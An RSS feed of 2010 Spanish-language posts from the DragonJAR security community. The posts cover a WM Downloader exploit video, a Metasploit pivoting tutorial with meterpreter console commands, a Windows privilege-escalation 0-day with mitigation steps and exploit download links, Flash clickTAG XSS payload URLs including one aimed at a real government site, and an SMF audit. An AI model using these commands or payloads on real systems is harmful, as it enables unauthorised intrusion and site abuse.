<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>La Comunidad DragonJAR &#187; Vulnerabilidad</title>
	<atom:link href="http://www.dragonjar.org/tag/vulnerabilidad/feed" rel="self" type="application/rss+xml" />
	<link>http://www.dragonjar.org</link>
	<description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description>
	<lastBuildDate>Wed, 17 Mar 2010 06:22:04 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Video: Explotando WM Downloader</title>
		<link>http://www.dragonjar.org/video-explotando-wm-downloader.xhtml</link>
		<comments>http://www.dragonjar.org/video-explotando-wm-downloader.xhtml#comments</comments>
		<pubDate>Fri, 29 Jan 2010 19:07:26 +0000</pubDate>
		<dc:creator>Epsilon</dc:creator>
				<category><![CDATA[Artículos sobre seguridad]]></category>
		<category><![CDATA[Herramientas Seguridad]]></category>
		<category><![CDATA[Descargar]]></category>
		<category><![CDATA[Download]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Exploits]]></category>
		<category><![CDATA[MP3]]></category>
		<category><![CDATA[Podcast]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Video]]></category>
		<category><![CDATA[Vulnera]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[WM Downloader]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3762</guid>
		<description><![CDATA[WM Downloader es un reproductor de Windows y un MP3 Stream Rippe/grabber (No graba directamente los sonidos desde el programa), el cual hace mas fácil descargar streaming de Windows y SHOUTcast Streams.  Con este programa puedes descargar de manera muy sencilla todos tus podcast o videopodcast favoritos.

Sin embargo WM Downloader en su versión  3.0.0.9 [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">WM Downloader es un reproductor de Windows y un MP3 Stream Rippe/grabber (No graba directamente los sonidos desde el programa), el cual hace mas fácil descargar streaming de Windows y SHOUTcast Streams.  Con este programa puedes descargar de manera muy sencilla todos tus podcast o videopodcast favoritos.</p>
<p style="text-align: center;"><img class="alignnone" src="http://www.mini-stream.net/res/images/wmdownloader/screenshot.gif" alt="WM Downloader Exploit" title="Video: Explotando WM Downloader " /></p>
<p style="text-align: justify;">Sin embargo WM Downloader en su versión  3.0.0.9 presenta algunos fallos de seguridad considerables, así lo demuestra DouBle Zer0 Zer0, en un vídeo donde nos  muestra como se puede explotar una vulnerabilidad de tipo &#8220;stack overflow&#8221; creando archivos m3u corruptos. A continuación el vídeo,  y el exploit lo pueden visualizar <a rel="nofollow" target="_blank" href="http://www.milw0rm.com/exploits/8403">desde acá</a>.<span id="more-3762"></span></p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="400" height="300" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://vimeo.com/moogaloop.swf?clip_id=6431352&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed type="application/x-shockwave-flash" width="400" height="300" src="http://vimeo.com/moogaloop.swf?clip_id=6431352&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://www.milw0rm.com/exploits/8403">WM Downloader (.M3U File) Local Stack Overflow POC</a><br />
<a rel="nofollow" target="_blank" href="http://mini-stream.net/wm-downloader/">Pagina Oficial del WM Downloader</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/todos-los-videos-de-antichat-parte-i.xhtml" title="Todos los Vídeos de AntiChat &#8211; Parte I">Todos los Vídeos de AntiChat &#8211; Parte I</a></li><li><a href="http://www.dragonjar.org/todos-los-videos-de-antichat-parte-ii.xhtml" title="Todos los Vídeos de AntiChat &#8211; Parte II">Todos los Vídeos de AntiChat &#8211; Parte II</a></li><li><a href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml" title="Detección de WebDAV, verificación de la vulnerabilidad y explotación">Detección de WebDAV, verificación de la vulnerabilidad y explotación</a></li><li><a href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a href="http://www.dragonjar.org/video-tutorial-de-nessus-y-baseline-security-analyzer.xhtml" title="Video Tutorial de Nessus y Baseline Security Analyzer">Video Tutorial de Nessus y Baseline Security Analyzer</a></li><li><a href="http://www.dragonjar.org/hacking-de-redes-upnp-parte-iii.xhtml" title="Hacking de Redes UPnP &#8211; Parte III">Hacking de Redes UPnP &#8211; Parte III</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/video-explotando-wm-downloader.xhtml/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</title>
		<link>http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml</link>
		<comments>http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml#comments</comments>
		<pubDate>Sun, 24 Jan 2010 21:12:55 +0000</pubDate>
		<dc:creator>Epsilon</dc:creator>
				<category><![CDATA[Herramientas Seguridad]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[consola]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[framework metasploit]]></category>
		<category><![CDATA[Maquinas]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[metasploit bypass]]></category>
		<category><![CDATA[meterpreter]]></category>
		<category><![CDATA[saltos]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Seguridad Informática]]></category>
		<category><![CDATA[Sesión]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3735</guid>
		<description><![CDATA[Algunas veces, al realizar un ataque es necesario vulnerar varias maquinas hasta llegar a nuestro objetivo final,  uno de los interrogantes mas  comunes en estas situaciones es ¿Como puedo atacar una maquina desde otra la cual ya tenga acceso?
Veamos un ejemplo:

Como podemos ver en la imagen anterior, un atacante puede ganar el acceso en algún [...]]]></description>
			<content:encoded><![CDATA[<p>Algunas veces, al realizar un ataque es necesario vulnerar varias maquinas hasta llegar a nuestro objetivo final,  uno de los interrogantes mas  comunes en estas situaciones es ¿Como puedo atacar una maquina desde otra la cual ya tenga acceso?</p>
<p>Veamos un ejemplo:</p>
<p style="text-align: center;"><img class="aligncenter" title="pivote metasploit" src="http://img25.imageshack.us/img25/1043/pivote.png" alt="pivote con el metasploit" width="446" height="472" /></p>
<p style="text-align: left;">Como podemos ver en la imagen anterior, un atacante puede ganar el acceso en algún servidor que se encuentre en la DMZ (zona desmiritalizada) y desde allí atacar otras maquinas que se encuentren detrás del cortafuegos. Para hacer esto posible el  amado  y conocido Metasploit nos puede ser muy útil.<span id="more-3735"></span></p>
<p style="text-align: left;">El primer paso obviamente  es encontrar una vulnerabilidad en el servidor que se encuentra en la DMZ, explotarla usando como payload meterpreter. En la consola del metasploit digitamos:</p>
<blockquote><p><code>use [exploit que ataca la vulnerabilidad encontrada]<br />
set PAYLOAD windows/meterpreter/bind_tcp<br />
set RHOST [ip_host_dmz]<br />
exploit-que-ataca-la-vulnerabilidad-encontrada</code></p></blockquote>
<p>Ahora necesitamos saber el ID de la sesión, para esto digitamos lo siguiente en la consola de meterpreter:</p>
<blockquote><p><code>sessions -l</code></p></blockquote>
<p>El siguiente paso es crear una ruta hacia la maquina objetivo, indicando su ip, la mascara y el ID session que obtuvimos en el paso anterior:</p>
<blockquote><p><code>msf&gt; route add [ip_maquina_objetivo] [Mascara  de red] [ID-Session]</code></p></blockquote>
<p>Por ultimo, lanzamos el ataque a la maquina objetivo, de forma normal como se haría en cualquier caso, es decir buscando la vulnerabilidad y aplicando el exploit respectivo, lo diferente es que debemos decirle al metasploit que debe pasar por el pc que ya se tiene acceso:</p>
<blockquote><p><code>msf&gt; use [exploit_necesario]<br />
msf&gt; set PAYLOAD windows/meterpreter/bind_tcp<br />
msf&gt; set RHOST [maquina_objetivo]<br />
msf&gt; exploit</code></p></blockquote>
<p>De esta forma podremos bypassear usando el metasploit, algo muy útil para todos los interesados en el área de la seguridad informática</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml" title="¿Cómo tomar control de un Dominio en Windows?">¿Cómo tomar control de un Dominio en Windows?</a></li><li><a href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a href="http://www.dragonjar.org/video-tutorial-fingerprint-escaneo-basico.xhtml" title="Video Tutorial Fingerprint y Escaneo Básico">Video Tutorial Fingerprint y Escaneo Básico</a></li><li><a href="http://www.dragonjar.org/todos-los-videos-de-antichat-parte-i.xhtml" title="Todos los Vídeos de AntiChat &#8211; Parte I">Todos los Vídeos de AntiChat &#8211; Parte I</a></li><li><a href="http://www.dragonjar.org/todos-los-videos-de-antichat-parte-ii.xhtml" title="Todos los Vídeos de AntiChat &#8211; Parte II">Todos los Vídeos de AntiChat &#8211; Parte II</a></li><li><a href="http://www.dragonjar.org/creando-un-exploit-paso-a-paso.xhtml" title="Creando un Exploit Paso a Paso">Creando un Exploit Paso a Paso</a></li><li><a href="http://www.dragonjar.org/pastel-chancuco-chuletas-seguridad-informatica.xhtml" title="Pastel, Cheet Sheets, Chuletas en la Seguridad Informática">Pastel, Cheet Sheets, Chuletas en la Seguridad Informática</a></li><li><a href="http://www.dragonjar.org/x-25-conferencia-de-seguridad-informatica-en-mexico.xhtml" title="X.25 Conferencia de Seguridad Informática en Mexico">X.25 Conferencia de Seguridad Informática en Mexico</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Vulnerabilidad 0-day en todas las versiones de Windows</title>
		<link>http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml</link>
		<comments>http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml#comments</comments>
		<pubDate>Wed, 20 Jan 2010 20:55:02 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[2003]]></category>
		<category><![CDATA[2008]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[Vulnerable]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Windows XP]]></category>
		<category><![CDATA[XP]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3720</guid>
		<description><![CDATA[Microsoft no ha empezado el año bien con respecto a la seguridad de sus productos, mientras muchos todavía esperamos los parches oficiales para el 0-Day en el  Internet Explorer que se anuncio hace poco, hoy sale a la luz publica otro 0-Day que afecta a todas las versiones del sistema operativo Microsoft Windows.

Este fallo descubierto [...]]]></description>
			<content:encoded><![CDATA[<p>Microsoft no ha empezado el año bien con respecto a la seguridad de sus productos, <a rel="nofollow" target="_blank" href="http://elladodelmal.blogspot.com/2010/01/protegere-contra-el-exploit-1day-de-ie.html">mientras muchos</a> todavía <a rel="nofollow" target="_blank" href="http://www.sahw.com/wp/archivos/2010/01/20/dep-en-internet-explorer-8-tocado-y-hundido/">esperamos</a> los <a rel="nofollow" target="_blank" href="http://blog.segu-info.com.ar/2010/01/parche-critico-para-ie-se-publica.html">parches oficiales para el 0-Day</a> en el  <a rel="nofollow" target="_blank" href="http://www.sahw.com/wp/archivos/2010/01/19/0-day-en-internet-explorer-la-proteccion-dep-y-sus-limitaciones/">Internet Explorer</a> que se anuncio hace poco, hoy sale a la luz publica <a rel="nofollow" target="_blank" href="http://www.securityfocus.com/data/vulnerabilities/exploits/37864.zip">otro 0-Day</a> que afecta a todas las versiones del sistema operativo Microsoft Windows.</p>
<p style="text-align: center;"><img class="alignnone" title="0day en Windows" src="http://farm3.static.flickr.com/2684/4291646450_4571861db7.jpg" alt="4291646450 4571861db7 Vulnerabilidad 0 day en todas las versiones de Windows" width="500" height="375" /></p>
<p>Este fallo descubierto por el investigador <a rel="nofollow" target="_blank" href="http://taviso.decsystem.org/">Tavis Ormandy (miembro del equipo de seguridad de google)</a>, se aprovecha del soporte heredado de aplicaciones de 16 bits que Windows viene heredando desde su versión &#8220;NT&#8221; y permite a un atacante obtener privilegios de SYSTEM (máximo privilegio en el sistema) en un sistema vulnerable.<span id="more-3720"></span></p>
<p>Aunque todavía no existe un parche para este fallo de seguridad,  solo tendremos que deshabilitar el soporte para aplicaciones de 16 bits para proteger nuestro sistema, a continuación les dejo una serie de pasos a seguir para desactivarlo:</p>
<ol>
<li>Inicio/Ejecutar gpedit.msc</li>
<li>Abrir &#8220;Configuración de equipo&#8221;/ &#8220;Plantillas administrativas&#8221;/ &#8220;Componentes de Windows&#8221;/&#8221;Compatibilidad de aplicación&#8221;</li>
<li>Y habilitar &#8220;Impedir el acceso a aplicaciones de 16 bits&#8221;</li>
</ol>
<p>O puedes seguir los pasos de los siguientes vídeos según tu sistema operativo</p>
<p>Windows Server 2003:</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/XRVI4iQ2Nug&amp;hl=es_ES&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/XRVI4iQ2Nug&amp;hl=es_ES&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>Windows Server 2008</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/u8pfXW7crEQ&amp;hl=es_ES&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/u8pfXW7crEQ&amp;hl=es_ES&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>Para Windows XP:</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/u7Y6d-BVwxk&amp;hl=es_ES&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/u7Y6d-BVwxk&amp;hl=es_ES&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>Ya existe un exploit publicado para este bug que funciona correctamente incluso en Windows 7, puedes encontrar el <a rel="nofollow" target="_blank" href="http://downloads.securityfocus.com/vulnerabilities/exploits/37864.zip">código fuente en este enlace</a>, o el <a rel="nofollow" target="_blank" href="http://www.4shared.com/file/202590202/dddbdf3f/0DayWin2__wwwDragonJARorg_.html">exploit compilado aquí</a>, por lo tanto es MAS QUE RECOMENDADO que desactives el soporte para 16 bits de tu sistema y actualices el mismo con Windows Update tan pronto salga el parche que corrija este problema.</p>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://www.hispasec.com/unaaldia/4106">Grave vulnerabilidad en Windows permite elevar privilegios</a><br />
<a rel="nofollow" target="_blank" href="http://www.genbeta.com/windows/vulnerabilidad-muy-critica-en-todas-las-versiones-de-windows">Vulnerabilidad muy crítica en todas las versiones de Windows</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a href="http://www.dragonjar.org/microsoft-publica-parche-que-corrige-vulnerabilidad-critica.xhtml" title="Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;">Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;</a></li><li><a href="http://www.dragonjar.org/recuperar-contrasenas-de-windows-vista-y-anteriores.xhtml" title=" Recuperar Contraseñas de Windows Vista y Anteriores"> Recuperar Contraseñas de Windows Vista y Anteriores</a></li><li><a href="http://www.dragonjar.org/dentro-del-corazon-de-windows-server-2008.xhtml" title="Dentro del corazón de Windows Server 2008">Dentro del corazón de Windows Server 2008</a></li><li><a href="http://www.dragonjar.org/guia-de-seguridad-de-windows-server-2003-2.xhtml" title="Guia de Seguridad de Windows Server 2003">Guia de Seguridad de Windows Server 2003</a></li><li><a href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a href="http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml" title="Parches para Windows que corrigen Vulnerabilidades Criticas">Parches para Windows que corrigen Vulnerabilidades Criticas</a></li><li><a href="http://www.dragonjar.org/denegacion-de-servicio-desde-el-wordpad.xhtml" title="Denegacion de Servicio desde el WordPad">Denegacion de Servicio desde el WordPad</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</title>
		<link>http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml</link>
		<comments>http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml#comments</comments>
		<pubDate>Sun, 17 Jan 2010 18:22:58 +0000</pubDate>
		<dc:creator>Axiacamus</dc:creator>
				<category><![CDATA[Artículos sobre seguridad]]></category>
		<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[Anuncios]]></category>
		<category><![CDATA[Flash]]></category>
		<category><![CDATA[HTML]]></category>
		<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[Macromedia]]></category>
		<category><![CDATA[SWF]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3644</guid>
		<description><![CDATA[Una de las aplicaciones mas comunes utilizadas en los sitios web,  son las películas y clics hechos en Adobe Flash (antes de Macromedia),  animaciones, slideshows  y anuncios publicitarios en este formato, están a la orden del día por toda la red. La facilidad con la que se crean y la gran cantidad de documentación sobre [...]]]></description>
			<content:encoded><![CDATA[<p>Una de las aplicaciones mas comunes utilizadas en los sitios web,  son las películas y clics hechos en Adobe Flash (<a rel="nofollow" target="_blank" href="http://www.adobe.com/aboutadobe/invrelations/adobeandmacromedia.html">antes de Macromedia</a>),  animaciones, slideshows  y anuncios publicitarios en este formato, están a la orden del día por toda la red. La facilidad con la que se crean y la gran cantidad de documentación sobre el uso de Flash, a colaborado para que su uso se extienda a millones de sitios web.</p>
<p style="text-align: center;"><img class="alignnone" title="Vulnerabilidad den Adobe Flash" src="http://farm3.static.flickr.com/2516/4281994965_8481cfbf7f_o.jpg" alt="4281994965 8481cfbf7f o Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash" width="290" height="200" /></p>
<p>A pesar de ser una herramienta muy útil,  personalmente pienso que esta sobreutilizada y que tiene gran cantidad de defectos, como no poder ser indexados adecuadamente en los buscadores,  la cantidad de recursos que consume cuando se utiliza para visualizar película s o vídeos online,  a esta lista de desventajas, ahora hay que sumarle un nuevo fallo de seguridad, descubierto por el investigador MustLive y publicado en su sitio <a rel="nofollow" target="_blank" href="http://websecurity.com.ua/3789/">websecurity.com.ua</a>.<span id="more-3644"></span></p>
<p>El fallo consiste en una vulnerabilidad de XSS (<em>Cross-site scripting</em>) la cual permite incrustar codigo Javascript y/o HTML, en algunas animaciones flash que no validan correctamente sus parámetros de entrada.</p>
<p><strong>Ejemplo del código vulnerable:</strong></p>
<p>Como se puede ver,  en el siguiente código actionscript, no se hace validación alguna a las variables obtenidas:</p>
<blockquote><p><code>getURL(_root.clickTAG, "_blank");</code></p></blockquote>
<p>El codigo anterio podria ser explotado de la siguiente forma:</p>
<blockquote><p><code>http://sitiovulnreable/flash.swf?clickTAG=javascript:alert('comunidad dragonjar')</code></p></blockquote>
<p>Pero no es la única variable vulnerable a este tipo de vulnerabilidades XSS</p>
<blockquote><p><code>getURL(_root.url, "_blank");</code></p></blockquote>
<p>Que puede ser explotada de la siguiente forma:</p>
<blockquote><p><code>http://sitiovulnreable/flash.swf?url=javascript:alert('comunidad dragonjar')</code></p></blockquote>
<p>Para ver el funcionamiento de este tipo de ataques, les dejo <a rel="nofollow" target="_blank" href="http://www.metropol.gov.co/aire/compartidos/imagenes/intro_simeca.swf?url=javascript:alert(%22Comuidad%20DragonJAR%22)//">este flash en el portal del &#8220;Area Metropolitana del Valle de Aburrá&#8221;</a>, donde podemos ver que con solo deja correr la animacion , nos ejecutara el alert en javascript que hemos incrustado de forma arbitraria en el archivo flash, por lo que podríamos realizar todo tipo de estafas y engaños utilizando el nombre de esta pagina del gobierno colombiano.</p>
<p>Este problema que afecta millones de sitios en la red (lo cual podemos comprobar con una simple búsqueda en google  &#8221;filetype:swf  inurl:clicktag&#8221;), es aun mas grave si se tiene en cuenta que la mayoría de las personas que manejan Flash y en especial su lenguaje de programación ActionScript, son diseñadores o programadores que no tienen en cuenta la seguridad a la hora de realizar sus trabajos, una muestra de esto lo podemos <a rel="nofollow" target="_blank" href="http://www.elheraldo.com.co/ELHERALDO/html/publicidadweb/index.html">ver en el periódico &#8221;El Heraldo&#8221; de Barranquilla que recomienda el uso de un código vulnerable</a> para realizar la publicidad que se publica en su portal.</p>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" title="Permanent Link: XSS vulnerabilities in 8 millions flash files" rel="bookmark" href="http://websecurity.com.ua/3789/">XSS vulnerabilities in 8 millions flash files</a><br />
<a rel="nofollow" target="_blank" href="http://www.theregister.co.uk/2009/12/22/mass_flash_file_vulnerability/" target="_blank">Serious web vuln found in 8 million Flash files XSS</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml" title="Multiples Vulnerabilidades en SMF">Multiples Vulnerabilidades en SMF</a></li><li><a href="http://www.dragonjar.org/cursos-gratis-de-diseno-web-en-el-sena-virtual.xhtml" title="Cursos Gratis de Diseño Web en el Sena Virtual">Cursos Gratis de Diseño Web en el Sena Virtual</a></li><li><a href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li><li><a href="http://www.dragonjar.org/criterios-para-la-evaluacion-de-los-escaners-de-seguridad-web.xhtml" title="Criterios para la Evaluación de los Escaners de Seguridad Web">Criterios para la Evaluación de los Escaners de Seguridad Web</a></li><li><a href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a href="http://www.dragonjar.org/descargar-gratis-internet-explorer-8-final.xhtml" title="Descargar Gratis Internet Explorer 8 Final">Descargar Gratis Internet Explorer 8 Final</a></li><li><a href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a href="http://www.dragonjar.org/los-blogs-alojados-en-wordpresscom-vulnerables.xhtml" title="Los Blogs alojados en WordPress.com Vulnerables ">Los Blogs alojados en WordPress.com Vulnerables </a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Multiples Vulnerabilidades en SMF</title>
		<link>http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml</link>
		<comments>http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml#comments</comments>
		<pubDate>Wed, 02 Dec 2009 16:45:13 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Auditoria]]></category>
		<category><![CDATA[Ejecución]]></category>
		<category><![CDATA[Hacker]]></category>
		<category><![CDATA[SMF]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3445</guid>
		<description><![CDATA[En el foro ElHacker.net sacaron adelante un proyecto destinado a realizar auditorías de seguridad a nivel WEB sobre el popular software de foros SMF 2.0 (Simple Machines Forum) con la finalidad de que sus desarrolladores puedan crear cada día un software mas robusto y seguro, esta auditorio dio como resultado mas de 40 fallos de [...]]]></description>
			<content:encoded><![CDATA[<p>En el foro ElHacker.net sacaron adelante un proyecto destinado a realizar auditorías de seguridad a nivel WEB sobre el popular software de foros SMF 2.0 (Simple Machines Forum) con la finalidad de que sus desarrolladores puedan crear cada día un software mas robusto y seguro, esta auditorio dio como resultado mas de <a rel="nofollow" target="_blank" href="http://code.google.com/p/smf2-review/issues/list">40 fallos de seguridad encontrados</a>, un <a rel="nofollow" target="_blank" href="http://foro.elhacker.net/nivel_web/backdoor_nativo_en_smf_20-t272107.0.html">posible backdoor</a> que los responsables de SMF tenían en el código.</p>
<p style="text-align: center;"><img class="alignnone" title="SMF Vulnerabilidad" src="http://farm3.static.flickr.com/2522/4152538793_bef8159247_o.jpg" alt="4152538793 bef8159247 o Multiples Vulnerabilidades en SMF" width="500" height="72" /></p>
<p>Entre los fallos encontrados existen 3 con peligrosidad alta (uno de ellos permite ejecución remota de código), 14 con un nivel de peligro medio (en su mayoría ataques del tipo XSS) y en resto de los fallos tienen un nivel de peligrosidad bajo o nulo.<span id="more-3445"></span></p>
<p>Desde la comunidad DragonJAR enviamos un saludo a los integrantes del equipo <a rel="nofollow" target="_blank" href="http://twitter.com/simpleaudit">SimpleAudit</a> no solo por los fallos encontrados, sino por la publicación responsable de ellos, esperando que <a rel="nofollow" target="_blank" href="http://www.simplemachines.org/community/index.php?topic=351341.0">SMF publicara una versión parcheada</a> de su software para hacer el <a rel="nofollow" target="_blank" href="http://seclists.org/fulldisclosure/2009/Dec/24">Full Disclosure</a>.</p>
<p>Cada uno de los fallos encontrados en SMF han sido publicados y explicados <a rel="nofollow" target="_blank" href="http://foro.elhacker.net/nivel_web/auditoria_de_seguridad_hacia_simple_machines_forum_20-t271199.0.html">en el foro de ElHacker.net</a> por <a rel="nofollow" target="_blank" href="http://twitter.com/WHK_">WHK</a>, ademas en nuestro idioma.</p>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://labs.elhacker.net/simpleaudit">Pagina del Proyecto</a><br />
<a rel="nofollow" target="_blank" href="http://foro.elhacker.net/nivel_web/auditoria_de_seguridad_hacia_simple_machines_forum_20-t271199.0.html">Anuncio en el Foro</a><br />
<a rel="nofollow" target="_blank" href="http://seclists.org/fulldisclosure/2009/Dec/24">Full Disclosure</a></p>
